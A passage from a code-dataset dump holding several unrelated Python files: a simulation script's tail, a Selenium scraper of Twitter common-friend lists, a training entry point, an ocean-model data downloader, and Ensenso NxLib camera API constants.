line.split(';')\n e_s_i = float(e_s_i)\n e_inf_i = float(e_inf_i)\n tau_i = float(tau_i)\n e_s_o = float(e_s_o)\n e_inf_o = float(e_inf_o)\n tau_o = float(tau_o.replace('\\n', ''))\n\n print('Simulating refs to \"measure\"', wk_dir, 'samples')\n print()\n sim_refs(wk_dir)\n print('Simulating traces - \"measuring\"', wk_dir, 'samples')\n sim_traces(wk_dir, e_s_i, e_inf_i, tau_i, e_s_o, e_inf_o, tau_o)\n print()\n print('Simulating refs to \"measure\"', wk_dir, 'references')\n sim_refs(wk_dir)\n print()\nprint('----------------------------')\nprint('Done')\nprint('----------------------------')\n","sub_path":"resolution_limit_sims_2layer.py","file_name":"resolution_limit_sims_2layer.py","file_ext":"py","file_size_in_byte":10052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"174349895","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : get_common_friend_by_twiangulate.py\n# @Author: Cedar\n# @Date : 2020/10/14\n# @Desc :\n\n\nfrom lxml import etree\nimport os\nimport time\nimport platform\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\n\n\ndriver = None\nold_height = 0\ncurpath = os.path.dirname(os.path.realpath(__file__))\ndriver_path = os.path.join(curpath, \"..\", \"..\", \"..\")\n\n\ndef check_height():\n new_height = driver.execute_script(\"return 
document.body.scrollHeight\")\n return new_height != old_height\n\n\ndef scroll(total_scrolls=5, scroll_time=10):\n global old_height\n current_scrolls = 0\n total_scrolls = int(total_scrolls)\n\n while True:\n try:\n if current_scrolls == total_scrolls:\n return\n\n old_height = driver.execute_script(\"return document.body.scrollHeight\")\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n WebDriverWait(driver, scroll_time, 5).until(lambda driver: check_height())\n current_scrolls += 1\n except TimeoutException:\n break\n return\n\n\ndef start_selenium(user_data_dir):\n global driver\n\n options = Options()\n # Code to disable notifications pop up of Chrome Browser\n options.add_argument(\"--disable-notifications\")\n options.add_argument(\"--disable-infobars\")\n options.add_argument(\"--mute-audio\")\n # on twitter the option below causes the login to fail\n # options.add_argument('--disable-gpu') # Google's docs say this flag is needed to work around a bug\n options.add_argument('blink-settings=imagesEnabled=false') # don't load images, for speed\n options.add_argument('--audio-output-channels=0')\n options.add_argument('--disable-default-apps')\n options.add_argument('--disable-extensions')\n options.add_argument('--disable-translate')\n options.add_argument('--disable-setuid-sandbox')\n options.add_argument('--disable-sync')\n # options.add_argument(\"--disable-javascript\") # disable JavaScript\n options.add_argument('--hide-scrollbars') # hide scrollbars, helps with some unusual pages\n options.add_argument('--no-sandbox') # run with top privileges, fixes the missing DevToolsActivePort file error\n options.add_experimental_option('excludeSwitches', ['enable-automation']) # hide window.navigator.webdriver\n # use a dedicated chrome user-data-dir: each directory keeps its own isolated\n # Chromedriver profile, so different accounts can stay logged in\n # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n options.add_argument(r\"user-data-dir=\" + user_data_dir)\n print(user_data_dir)\n\n # open chrome and log the account in manually:\n # google-chrome --user-data-dir=\"/home/kismanager/KIS/selenium/Twitter\"\n # !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n\n try:\n platform_ = platform.system().lower()\n if platform_ in ['linux', 'darwin']:\n options.add_argument('--headless') # the browser renders no visible UI\n chromedriver_path = os.path.join(driver_path, \"chromedriver\")\n driver = webdriver.Chrome(executable_path=chromedriver_path, options=options)\n else:\n user_data_dir = 'E:\\\\selenium\\\\AutomationProfile1'\n options.add_argument(r\"user-data-dir=\" + user_data_dir)\n chromedriver_path = os.path.join(driver_path, \"chromedriver.exe\")\n driver = webdriver.Chrome(executable_path=chromedriver_path, options=options)\n except Exception as e:\n print(e)\n\n driver.set_page_load_timeout(60) # page load timeout\n driver.set_script_timeout(60) # async JS execution timeout\n # driver.maximize_window()\n\n\ndef get_common_friend_by_twiangulate(url, user_data_dir):\n\n author_list = []\n try:\n start_selenium(user_data_dir)\n driver.get(url)\n time.sleep(10)\n page_source = driver.page_source\n driver.close()\n # use etree for xpath slicing, which produces fewer errors\n root = etree.HTML(page_source, parser=etree.HTMLParser(encoding='utf-8'))\n items = root.xpath('//table[@id=\"result_list\"]//tr')\n for item in items:\n # don't use item.xpath('.//a[@class=\"person_link\"]/text()')[0]; it can raise list index out of range\n # author_id is not available on the page\n # author_id = \"\"\n author_account = \"\".join(item.xpath('./td[2]/@data-sort'))\n author_name = \"\"\n author_url = 'https://twitter.com/' + author_account\n author_img_url = \"\".join(item.xpath('./td[2]//img/@src'))\n author_description = \"\".join(item.xpath('./td[3]//text()'))\n
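 # Column layout inferred from the xpaths used on twiangulate's result\n # table: td[2] holds the account handle (@data-sort) and avatar image,\n # td[3] the description text, td[4] the following count and td[5] the\n # follower count.\n 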
author_following_count = \"\".join(item.xpath('./td[4]/@data-sort'))\n author_follower_count = \"\".join(item.xpath('./td[5]/@data-sort'))\n author_message_count = \"\"\n\n author_item = {\n # \"author_id\": author_id,\n \"author_account\": author_account,\n \"author_name\": author_name,\n \"author_url\": author_url,\n \"author_img_url\": author_img_url,\n \"author_description\": author_description,\n \"author_follower_count\": author_follower_count,\n \"author_following_count\": author_following_count,\n \"author_message_count\": author_message_count,\n }\n if len(author_account) > 0:\n author_list.append(author_item)\n\n except Exception as e:\n driver.close()\n print(e)\n return str(e)\n\n return author_list\n\n\ndef main():\n url = 'http://www.twiangulate.com/search/anthonychao-David_P_Mullins/common_friends/table/my_friends-1/'\n user_data_dir = 'E:\\\\selenium\\\\AutomationProfile1'\n result = get_common_friend_by_twiangulate(url, user_data_dir)\n print(result)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"service_app/model/twitter/extractor/lib/get_common_friend_by_twiangulate.py","file_name":"get_common_friend_by_twiangulate.py","file_ext":"py","file_size_in_byte":5983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"478033419","text":"import argparse\nfrom train import *\n\ndef parse_args():\n parser = argparse.ArgumentParser(description=\"SPDS_FinalPJT\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--batchsize\", default=25, type=int, dest=\"batchsize\") \n parser.add_argument(\"--epochs\", default=10, type=int, dest=\"epochs\")\n parser.add_argument(\"--train_dir\", default=\"/home/spds066/rps/\", type=str, dest=\"train_dir\")\n parser.add_argument(\"--val_dir\", default=\"/home/spds066/rps-test-set/\", type=str, dest=\"val_dir\")\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n train(args)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"task1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"201923918","text":"import time\nimport os\nimport h5py\nimport numpy as np\nimport pandas as pd\nfrom tqdm.auto import trange\nimport argparse\n\n\nimport torch\n\nimport xmitgcm.llcreader as llcreader\n\nfrom ulmo.llc.slurp import write_xr\nfrom ulmo import io as ulmo_io\n\nfrom IPython import embed\n\ndef parse_option():\n    \"\"\"\n    Parse the command-line arguments.\n    Returns:\n        args: (argparse.Namespace) the parsed arguments.\n    \"\"\"\n    parser = argparse.ArgumentParser(\"LLC SSH\")\n    parser.add_argument(\"--task\", type=str,\n                        help=\"task to execute: 'download','evaluate', 'umap'.\")\n    parser.add_argument(\"--istart\", type=int, default=0,\n                        help=\"Starting file\")\n    #parser.add_argument(\"--n_cores\", type=int, help=\"Number of CPU to use\")\n    #parser.add_argument(\"--day\", type=int, default=1, help=\"Day to start extraction from\")\n    args = parser.parse_args()\n\n    return args\n\ndef llc_download(pargs, model_name='LLC4320', tstep=6, \n varnames=['Theta','U','V','W','Salt','Eta',\n 'oceTAUX','oceTAUY'],\n clobber=False): \n if model_name == 'LLC4320':\n model = llcreader.ECCOPortalLLC4320Model()\n tstep_hr = 144 # Time steps per hour\n\n # Get dataset\n iter_step = tstep_hr*tstep\n ds = model.get_dataset(\n varnames=varnames, k_levels=[0], type='latlon', \n iter_step=iter_step)\n\n tsize = ds.time.size\n print(\"Model is ready\")\n\n
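 # A sketch of the naming convention used below (times are illustrative):\n #   outfile -> 'LLC4320_2011-09-13T06_00_00.nc'   (colons replaced by '_')\n #   s3_file -> 's3://llc/data/6-hour/' + outfile  (for the default tstep=6)\n 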
# Check for existing files\n s3_path = f'/data/{tstep}-hour/'\n s3_files = ulmo_io.list_of_bucket_files('llc',\n prefix=s3_path)\n if len(s3_files) > 0:\n s3_files = ['s3://llc/'+ifile for ifile in s3_files]\n\n # Loop me\n for tt in range(pargs.istart, tsize):\n # Get dataset\n iter_step = tstep_hr*tstep\n ds = model.get_dataset(varnames=varnames,\n k_levels=[0], type='latlon',\n iter_step=iter_step)\n #\n print(\"Time step = {} of {}\".format(tt, ds.time.size))\n\n ds_0 = ds.isel(time=tt, k=0) \n # Generate outfile name\n outfile = '{:s}_{:s}.nc'.format(model_name,\n str(ds_0.time.values)[:19].replace(':','_'))\n s3_file = 's3://llc'+s3_path+outfile\n # No clobber\n if not clobber and s3_file in s3_files:\n print(\"Not clobbering: {}\".format(s3_file))\n continue\n # Write\n write_xr(ds_0, outfile)\n print(\"Wrote: {}\".format(outfile))\n\n # Push to s3\n ulmo_io.upload_file_to_s3(outfile, s3_file)\n\n # Clean up\n del(ds)\n os.remove(outfile)\n\nif __name__ == \"__main__\":\n # parse the command-line arguments.\n pargs = parse_option()\n \n # run the 'llc_download()' function.\n if pargs.task == 'download':\n print(\"Download starts.\")\n llc_download(pargs)\n print(\"Download Ends.\")\n ","sub_path":"ulmo/runs/LLC/ssh/llc_ssh.py","file_name":"llc_ssh.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"147313915","text":"import json\n\nfrom .exception import NxLibError as _NxLibError\nfrom .command import NxLibCommand as _NxLibCommand\nfrom .helper import convert_camel_to_upper_snake as _convert_camel_to_upper_snake\nfrom .helper import fix_nxlib_prefix as _fix_nxlib_prefix\n\nNXLIB_ITEM_SEPARATOR = '/'\nNXLIB_INDEX_ESCAPE_CHAR = '\\\\'\nNXLIB_ITEM_FORBIDDEN_CHARS = \"\\r\\n\\\"/\\\\\\0\"\n\nNXLIB_BAD_REQUEST = 11\nNXLIB_BUFFER_NOT_DIVISIBLE_BY_ELEMENT_SIZE = 16\nNXLIB_BUFFER_TOO_SMALL = 15\nNXLIB_CANNOT_CREATE_ITEM = 1\nNXLIB_COMMAND_RUNNING = 19\nNXLIB_CONNECTION_NOT_COMPATIBLE = 22\nNXLIB_COULD_NOT_INTERPRET_JSON_TEXT = 2\nNXLIB_COULD_NOT_LOAD_FUNCTION = 21\nNXLIB_COULD_NOT_LOAD_LIBRARY = 20\nNXLIB_COULD_NOT_OPEN_PORT = 6\nNXLIB_DEBUG_MESSAGE_OVERFLOW = 18\nNXLIB_EXECUTION_FAILED = 17\nNXLIB_INITIALIZATION_NOT_ALLOWED = 23\nNXLIB_INTERNAL_ERROR = 7\nNXLIB_INVALID_BUFFER_SIZE = 14\nNXLIB_ITEM_INEXISTENT = 3\nNXLIB_ITEM_TYPE_NOT_COMPATIBLE = 13\nNXLIB_METHOD_INVALID = 10\nNXLIB_NESTING_LIMIT_REACHED = 24\nNXLIB_NO_DEBUG_DATA = 5\nNXLIB_NO_OPEN_PROFILE_BLOCK = 25\nNXLIB_NOT_CONNECTED = 9\nNXLIB_OPERATION_SUCCEEDED = 0\nNXLIB_TIMEOUT = 8\nCMD_ADAPTER_CONFIGURATION = \"AdapterConfiguration\"\nCMD_ADD_PATTERN_BUFFER_VIEW = \"AddPatternBufferView\"\nCMD_ADJUST_EXPOSURE_AND_GAIN = \"AdjustExposureAndGain\"\nCMD_BREAK = \"Break\"\nCMD_CALIBRATE = \"Calibrate\"\nCMD_CALIBRATE_HAND_EYE = \"CalibrateHandEye\"\nCMD_CALIBRATE_IN_BACKGROUND = \"CalibrateInBackground\"\nCMD_CALIBRATE_PATTERN = \"CalibratePattern\"\nCMD_CALIBRATE_UPDATE_PATTERNS = \"CalibrateUpdatePatterns\"\nCMD_CALIBRATE_WORKSPACE = \"CalibrateWorkspace\"\nCMD_CAPTURE = \"Capture\"\nCMD_CHAIN_TRANSFORMATIONS = \"ChainTransformations\"\nCMD_CLEAR_IMAGE_BUFFER = \"ClearImageBuffer\"\nCMD_CLEAR_IMAGES = \"ClearImages\"\nCMD_CLEAR_OVERLAY = \"ClearOverlay\"\nCMD_CLOSE = \"Close\"\nCMD_COLLECT_PATTERN = \"CollectPattern\"\nCMD_COLLECT_PLANE_POINTS = \"CollectPlanePoints\"\nCMD_COMPUTE_DISPARITY_MAP = \"ComputeDisparityMap\"\nCMD_COMPUTE_IMAGE_CONTRAST = \"ComputeImageContrast\"\nCMD_COMPUTE_NORMALS = \"ComputeNormals\"\nCMD_COMPUTE_POINT_MAP = 
\"ComputePointMap\"\nCMD_CONVERT_TRANSFORMATION = \"ConvertTransformation\"\nCMD_CREATE_CAMERA = \"CreateCamera\"\nCMD_DELETE_CAMERA = \"DeleteCamera\"\nCMD_DISCARD_PATTERNS = \"DiscardPatterns\"\nCMD_ESTIMATE_DISPARITY_SETTINGS = \"EstimateDisparitySettings\"\nCMD_ESTIMATE_PATTERN_POSE = \"EstimatePatternPose\"\nCMD_ETHERNET_CONFIGURATION = \"EthernetConfiguration\"\nCMD_FILTER_PATTERN_BUFFER = \"FilterPatternBuffer\"\nCMD_FIT_PRIMITIVE = \"FitPrimitive\"\nCMD_FLASH = \"Flash\"\nCMD_GENERATE_CALIBRATION_PATTERN = \"GenerateCalibrationPattern\"\nCMD_GET_CONSTANTS = \"GetConstants\"\nCMD_GET_MODEL_INFO = \"GetModelInfo\"\nCMD_GET_PATTERN_BUFFER = \"GetPatternBuffer\"\nCMD_GET_PATTERN_BUFFERS = \"GetPatternBuffers\"\nCMD_GET_RAW_CALIBRATION_DATA = \"GetRawCalibrationData\"\nCMD_INTERNAL_PWM = \"InternalPwm\"\nCMD_LOAD_CALIBRATION = \"LoadCalibration\"\nCMD_LOAD_IMAGE = \"LoadImage\"\nCMD_LOAD_TEXT = \"LoadText\"\nCMD_LOAD_U_EYE_PARAMETER_SET = \"LoadUEyeParameterSet\"\nCMD_MEASURE_CALIBRATION = \"MeasureCalibration\"\nCMD_NETWORK_CONTROL = \"NetworkControl\"\nCMD_OPEN = \"Open\"\nCMD_PATTERN_BUFFER_INFO = \"PatternBufferInfo\"\nCMD_PROJECT_PATTERN = \"ProjectPattern\"\nCMD_RECALIBRATE = \"Recalibrate\"\nCMD_RECTIFY_IMAGES = \"RectifyImages\"\nCMD_REDUCE_PATTERN_BUFFER = \"ReducePatternBuffer\"\nCMD_REDUCE_PATTERNS = \"ReducePatterns\"\nCMD_REMOVE_PATTERN_BUFFER_VIEW = \"RemovePatternBufferView\"\nCMD_RENDER_DEPTH_MAP = \"RenderDepthMap\"\nCMD_RENDER_POINT_MAP = \"RenderPointMap\"\nCMD_RENDER_VIEW = \"RenderView\"\nCMD_RETRIEVE = \"Retrieve\"\nCMD_SAVE_IMAGE = \"SaveImage\"\nCMD_SAVE_MODEL = \"SaveModel\"\nCMD_SAVE_TEXT = \"SaveText\"\nCMD_SET_PATTERN_BUFFER = \"SetPatternBuffer\"\nCMD_SET_PATTERN_BUFFERS = \"SetPatternBuffers\"\nCMD_SET_STATUS_LEDS = \"SetStatusLeds\"\nCMD_SIMULATE_PHYSICS = \"SimulatePhysics\"\nCMD_STORE_CALIBRATION = \"StoreCalibration\"\nCMD_SYNCHRONIZE = \"Synchronize\"\nCMD_TRIGGER = \"Trigger\"\nCMD_UPDATE_FIRMWARE = \"UpdateFirmware\"\nCMD_VISUALIZE_PATTERN_BUFFER = \"VisualizePatternBuffer\"\nERR_CALIBRATION_FAILED = \"CalibrationFailed\"\nERR_CAMERA_NOT_FOUND = \"CameraNotFound\"\nERR_CHANGED_MODEL = \"ChangedModel\"\nERR_COMMAND_NOT_ALLOWED = \"CommandNotAllowed\"\nERR_COMMAND_UNKNOWN = \"CommandUnknown\"\nERR_EMPTY_IMAGE = \"EmptyImage\"\nERR_INVALID_CALIBRATION_DATA = \"InvalidCalibrationData\"\nERR_INVALID_PAIRING_DATA = \"InvalidPairingData\"\nERR_INVALID_PATTERN_BUFFER = \"InvalidPatternBuffer\"\nERR_NO_WORKSPACE_LINK = \"NoWorkspaceLink\"\nERR_NOT_ENOUGH_POINTS_FOR_PRIMITIVE = \"NotEnoughPointsForPrimitive\"\nERR_OPERATION_CANCELED = \"OperationCanceled\"\nERR_PATTERN_BUFFER_LOCKED = \"PatternBufferLocked\"\nERR_PATTERN_DATA_INCOMPATIBLE = \"PatternDataIncompatible\"\nERR_PATTERN_NOT_DECODABLE = \"PatternNotDecodable\"\nERR_PATTERN_NOT_FOUND = \"PatternNotFound\"\nERR_SENSOR_NOT_COMPATIBLE = \"SensorNotCompatible\"\nERR_UNHANDLED_EXCEPTION = \"UnhandledException\"\nERR_WIRING_TEST_FAILED = \"WiringTestFailed\"\nNXLIB_ITEM_TYPE_ARRAY = 5\nNXLIB_ITEM_TYPE_BOOL = 4\nNXLIB_ITEM_TYPE_INVALID = 0\nNXLIB_ITEM_TYPE_NULL = 1\nNXLIB_ITEM_TYPE_NUMBER = 2\nNXLIB_ITEM_TYPE_OBJECT = 6\nNXLIB_ITEM_TYPE_STRING = 3\nITM_ABSOLUTE_BLACK_LEVEL_OFFSET = \"AbsoluteBlackLevelOffset\"\nITM_ACTIVE = \"Active\"\nITM_ADAPTERS = \"Adapters\"\nITM_ADJUST_EXPOSURE = \"AdjustExposure\"\nITM_ADJUST_GAIN = \"AdjustGain\"\nITM_ALIGN_AXIS = \"AlignAxis\"\nITM_ALL = \"All\"\nITM_ALLOW_FIRMWARE_UPLOAD = \"AllowFirmwareUpload\"\nITM_AMBIENT = \"Ambient\"\nITM_AND = \"And\"\nITM_ANGLE = 
\"Angle\"\nITM_ANGLES = \"Angles\"\nITM_APERTURE = \"Aperture\"\nITM_API_ERRORS = \"ApiErrors\"\nITM_APPLICATION = \"Application\"\nITM_APPLY = \"Apply\"\nITM_ARCHITECTURE = \"Architecture\"\nITM_AREA_OF_INTEREST = \"AreaOfInterest\"\nITM_ASSEMBLY_CALIBRATION = \"AssemblyCalibration\"\nITM_ASSEMBLY_PATTERN = \"AssemblyPattern\"\nITM_ASYNCHRONOUSLY_TRIGGERED = \"AsynchronouslyTriggered\"\nITM_AUTO_BLACK_LEVEL = \"AutoBlackLevel\"\nITM_AUTO_EXPOSURE = \"AutoExposure\"\nITM_AUTO_FOCUS = \"AutoFocus\"\nITM_AUTO_GAIN = \"AutoGain\"\nITM_AUTO_SWAP = \"AutoSwap\"\nITM_AUTOMATIC = \"Automatic\"\nITM_AVAILABLE = \"Available\"\nITM_AVERAGE = \"Average\"\nITM_AVERAGE_POSE_ERROR = \"AveragePoseError\"\nITM_AXIS = \"Axis\"\nITM_BACKGROUND = \"Background\"\nITM_BANDWIDTH = \"Bandwidth\"\nITM_BANDWIDTH_LIMIT = \"BandwidthLimit\"\nITM_BASELINE = \"Baseline\"\nITM_BINARY_INFO = \"BinaryInfo\"\nITM_BINNING = \"Binning\"\nITM_BINNING_SHIFT = \"BinningShift\"\nITM_BLACK_LEVEL_OFFSET = \"BlackLevelOffset\"\nITM_BLACK_LEVEL_OFFSET_CALIBRATION = \"BlackLevelOffsetCalibration\"\nITM_BLIND = \"Blind\"\nITM_BLUR = \"Blur\"\nITM_BLUR_MIN_MAX = \"BlurMinMax\"\nITM_BOARD = \"Board\"\nITM_BOOTLOADER = \"Bootloader\"\nITM_BORDER_SPREAD = \"BorderSpread\"\nITM_BOUNDING_BOX = \"BoundingBox\"\nITM_BRIGHTNESS = \"Brightness\"\nITM_BUFFER = \"Buffer\"\nITM_BUFFER_COUNT = \"BufferCount\"\nITM_BUFFER_SIZE = \"BufferSize\"\nITM_BUILD = \"Build\"\nITM_BY_EEPROM_ID = \"ByEepromId\"\nITM_BY_SERIAL_NO = \"BySerialNo\"\nITM_CPU = \"CPU\"\nITM_CRC_ERROR_COUNT = \"CRCErrorCount\"\nITM_CUDA = \"CUDA\"\nITM_CAL_TAB_TYPE = \"CalTabType\"\nITM_CAL_TABS = \"CalTabs\"\nITM_CALCULATE_IP = \"CalculateIp\"\nITM_CALIBRATED = \"Calibrated\"\nITM_CALIBRATION = \"Calibration\"\nITM_CALIBRATION_FILE = \"CalibrationFile\"\nITM_CALIBRATION_HISTORY = \"CalibrationHistory\"\nITM_CAMERA = \"Camera\"\nITM_CAMERAS = \"Cameras\"\nITM_CAPTURE = \"Capture\"\nITM_CAPTURE_EVENTS = \"CaptureEvents\"\nITM_CENTER = \"Center\"\nITM_CHECK = \"Check\"\nITM_CHECK_DAEMON = \"CheckDaemon\"\nITM_CLEAR_IMAGE_BUFFER_ON_TRIGGER = \"ClearImageBufferOnTrigger\"\nITM_CLOCK_RATE = \"ClockRate\"\nITM_CODE_METER = \"CodeMeter\"\nITM_COLOR = \"Color\"\nITM_COLOR_OFFSET = \"ColorOffset\"\nITM_COLOR_REPETITION_DISTANCE = \"ColorRepetitionDistance\"\nITM_COMMAND = \"Command\"\nITM_COMMANDS = \"Commands\"\nITM_COMMON_ITEMS = \"CommonItems\"\nITM_COMMON_VALUES = \"CommonValues\"\nITM_COMPONENT_THRESHOLD = \"ComponentThreshold\"\nITM_COMPUTE_CAPABILITY = \"ComputeCapability\"\nITM_COMPUTE_DISPARITY_MAP = \"ComputeDisparityMap\"\nITM_CONFIGURATION = \"Configuration\"\nITM_CONNECTED = \"Connected\"\nITM_CONNECTED_CAMERAS = \"ConnectedCameras\"\nITM_CONNECTED_PATTERNS = \"ConnectedPatterns\"\nITM_CONTENT = \"Content\"\nITM_CONTRAST = \"Contrast\"\nITM_CORES = \"Cores\"\nITM_COST_SCALE = \"CostScale\"\nITM_COUNT = \"Count\"\nITM_DHCP = \"DHCP\"\nITM_DAY = \"Day\"\nITM_DEBUG = \"Debug\"\nITM_DECODE_DATA = \"DecodeData\"\nITM_DEFAULT = \"Default\"\nITM_DEFAULT_GATEWAY = \"DefaultGateway\"\nITM_DEFAULT_PARAMETERS = \"DefaultParameters\"\nITM_DEFINED_POSE = \"DefinedPose\"\nITM_DEPTH = \"Depth\"\nITM_DEPTH_CHANGE_COST = \"DepthChangeCost\"\nITM_DEPTH_STEP_COST = \"DepthStepCost\"\nITM_DESTINATION = \"Destination\"\nITM_DEVICE = \"Device\"\nITM_DEVICES = \"Devices\"\nITM_DIFFUSE = \"Diffuse\"\nITM_DIRECTION = \"Direction\"\nITM_DISPARITY = \"Disparity\"\nITM_DISPARITY_ACCURACY = \"DisparityAccuracy\"\nITM_DISPARITY_MAP = \"DisparityMap\"\nITM_DISPARITY_MAP_OFFSET = 
\"DisparityMapOffset\"\nITM_DISPARITY_STEP = \"DisparityStep\"\nITM_DISTANCE = \"Distance\"\nITM_DISTORTION = \"Distortion\"\nITM_DOWNLOAD_IMAGES = \"DownloadImages\"\nITM_DOWNSAMPLE = \"Downsample\"\nITM_DRAW_AXES = \"DrawAxes\"\nITM_DRAW_ONLY = \"DrawOnly\"\nITM_DRAW_ORIGIN = \"DrawOrigin\"\nITM_DRIVER = \"Driver\"\nITM_DURATION = \"Duration\"\nITM_DUTY_CYCLE = \"DutyCycle\"\nITM_DYNAMIC = \"Dynamic\"\nITM_DYNAMIC_CALIBRATION_LIMIT_REACHED = \"DynamicCalibrationLimitReached\"\nITM_DYNAMIC_OFFSETS = \"DynamicOffsets\"\nITM_EEPROM_FORMAT = \"EepromFormat\"\nITM_EEPROM_ID = \"EepromId\"\nITM_ENABLE_IP_FILTER = \"EnableIpFilter\"\nITM_ENABLED = \"Enabled\"\nITM_ENCODING = \"Encoding\"\nITM_EPIPOLAR = \"Epipolar\"\nITM_EPIPOLAR_ERROR = \"EpipolarError\"\nITM_ERROR_SYMBOL = \"ErrorSymbol\"\nITM_ERROR_TEXT = \"ErrorText\"\nITM_ERRORS = \"Errors\"\nITM_ESTIMATE_GRID_SPACING = \"EstimateGridSpacing\"\nITM_ETHERNET = \"Ethernet\"\nITM_ETHERNET_CONFIG_MODE = \"EthernetConfigMode\"\nITM_EXECUTE = \"Execute\"\nITM_EXPOSURE = \"Exposure\"\nITM_EXT = \"Ext\"\nITM_EXTENDED_TYPE = \"ExtendedType\"\nITM_FACTORY = \"Factory\"\nITM_FAILURE_PROBABILITY = \"FailureProbability\"\nITM_FAR = \"Far\"\nITM_FILE_OUTPUT = \"FileOutput\"\nITM_FILE_PREFIX = \"FilePrefix\"\nITM_FILENAME = \"Filename\"\nITM_FILL_XY_COORDINATES = \"FillXYCoordinates\"\nITM_FILLING = \"Filling\"\nITM_FILTER = \"Filter\"\nITM_FILTERS = \"Filters\"\nITM_FINAL_TRIGGER = \"FinalTrigger\"\nITM_FIRMWARE_UPLOAD = \"FirmwareUpload\"\nITM_FIRMWARE_VERSION = \"FirmwareVersion\"\nITM_FIXED = \"Fixed\"\nITM_FLAGS = \"Flags\"\nITM_FLASH_DELAY = \"FlashDelay\"\nITM_FLEX_VIEW = \"FlexView\"\nITM_FOCAL_LENGTH = \"FocalLength\"\nITM_FOCUS = \"Focus\"\nITM_FOCUS_DISTANCE = \"FocusDistance\"\nITM_FOLDER_PATH = \"FolderPath\"\nITM_FOLLOW_DYNAMIC_OFFSETS = \"FollowDynamicOffsets\"\nITM_FONT = \"Font\"\nITM_FORCE = \"Force\"\nITM_FORCE_GRAYSCALE = \"ForceGrayscale\"\nITM_FORCED_RAW_IMAGE_SIZE = \"ForcedRawImageSize\"\nITM_FORCED_RECTIFIED_IMAGE_SIZE = \"ForcedRectifiedImageSize\"\nITM_FREQUENCY = \"Frequency\"\nITM_FROM_DYNAMIC = \"FromDynamic\"\nITM_FRONT_LIGHT = \"FrontLight\"\nITM_GAIN = \"Gain\"\nITM_GAIN_BOOST = \"GainBoost\"\nITM_GATEWAY = \"Gateway\"\nITM_GENERATE_EMPTY_CALIBRATION = \"GenerateEmptyCalibration\"\nITM_GLOBAL_PATTERN_DATA_UPDATED = \"GlobalPatternDataUpdated\"\nITM_GLOBAL_SHUTTER = \"GlobalShutter\"\nITM_GLOW = \"Glow\"\nITM_GRAVITY = \"Gravity\"\nITM_GREEN = \"Green\"\nITM_GRID_SIZE = \"GridSize\"\nITM_GRID_SPACING = \"GridSpacing\"\nITM_GROUND_PLANE = \"GroundPlane\"\nITM_HUD = \"HUD\"\nITM_HALF_VERGENCE = \"HalfVergence\"\nITM_HARDWARE_FAILURE = \"HardwareFailure\"\nITM_HARDWARE_GAMMA = \"HardwareGamma\"\nITM_HAS_LICENSE = \"HasLicense\"\nITM_HASH = \"Hash\"\nITM_HDR = \"Hdr\"\nITM_HEIGHT = \"Height\"\nITM_HIGH_QUALITY_RENDERING = \"HighQualityRendering\"\nITM_HORIZONTAL = \"Horizontal\"\nITM_IO = \"IO\"\nITM_IGNORE_ENSENSO_PATTERN_ENCODING = \"IgnoreEnsensoPatternEncoding\"\nITM_IMAGE_BUFFER = \"ImageBuffer\"\nITM_IMAGE_DOWNLOAD_LIMIT = \"ImageDownloadLimit\"\nITM_IMAGE_FOLDER = \"ImageFolder\"\nITM_IMAGE_NAME = \"ImageName\"\nITM_IMAGE_OFFSET = \"ImageOffset\"\nITM_IMAGE_SET = \"ImageSet\"\nITM_IMAGE_SIZE = \"ImageSize\"\nITM_IMAGES = \"Images\"\nITM_INDEX = \"Index\"\nITM_INFO = \"Info\"\nITM_INFO_TIMEOUT = \"InfoTimeout\"\nITM_INITIAL_TRIGGER = \"InitialTrigger\"\nITM_INITIAL_VELOCITY = \"InitialVelocity\"\nITM_INLIER_COUNT = \"InlierCount\"\nITM_INLIER_FRACTION = \"InlierFraction\"\nITM_INLIER_THRESHOLD = 
\"InlierThreshold\"\nITM_INPUT = \"Input\"\nITM_INTEGRATED = \"Integrated\"\nITM_INTERFACE = \"Interface\"\nITM_INTERNAL_TRIGGER = \"InternalTrigger\"\nITM_INTERVAL = \"Interval\"\nITM_INVERSE = \"Inverse\"\nITM_INVERT = \"Invert\"\nITM_IP_ADDRESS = \"IpAddress\"\nITM_IP_BROADCAST = \"IpBroadcast\"\nITM_IP_SUBNET_MASK = \"IpSubnetMask\"\nITM_ITEM_TYPES = \"ItemTypes\"\nITM_ITEMS = \"Items\"\nITM_ITERATIONS = \"Iterations\"\nITM_K1 = \"K1\"\nITM_K2 = \"K2\"\nITM_K3 = \"K3\"\nITM_KEEP_ALIVE_TIMEOUT = \"KeepAliveTimeout\"\nITM_LED = \"LED\"\nITM_LATEST_MESSAGE = \"LatestMessage\"\nITM_LEFT = \"Left\"\nITM_LEFT_BOTTOM = \"LeftBottom\"\nITM_LEFT_TOP = \"LeftTop\"\nITM_LENS = \"Lens\"\nITM_LENSES = \"Lenses\"\nITM_LEVEL = \"Level\"\nITM_LIGHTING = \"Lighting\"\nITM_LINK = \"Link\"\nITM_LINKS = \"Links\"\nITM_LIST_CAL_TABS = \"ListCalTabs\"\nITM_LIST_LENSES = \"ListLenses\"\nITM_LIST_MODELS = \"ListModels\"\nITM_LIST_PATTERNS = \"ListPatterns\"\nITM_LIST_SENSORS = \"ListSensors\"\nITM_LOAD_CALIBRATION = \"LoadCalibration\"\nITM_LOCAL_EEPROM_FILE = \"LocalEepromFile\"\nITM_LOW_BANDWIDTH 